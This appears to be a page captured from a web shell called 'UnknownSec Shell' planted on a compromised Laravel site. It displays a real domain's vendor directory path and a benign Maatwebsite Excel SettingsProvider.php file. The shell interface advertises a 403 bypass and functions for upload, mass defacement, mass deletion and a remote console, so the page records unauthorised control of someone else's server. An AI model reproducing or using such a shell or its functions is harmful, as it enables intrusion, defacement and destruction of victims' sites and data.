shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
maatwebsite
/
excel
/
src
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
SettingsProvider.php
<?php namespace Maatwebsite\Excel; use Maatwebsite\Excel\Cache\CacheManager; use PhpOffice\PhpSpreadsheet\Settings; class SettingsProvider { /** * @var CacheManager */ private $cache; public function __construct(CacheManager $cache) { $this->cache = $cache; } /** * Provide PhpSpreadsheet settings. */ public function provide() { $this->configureCellCaching(); } protected function configureCellCaching() { Settings::setCache( $this->cache->driver() ); } }
© 2026 UnknownSec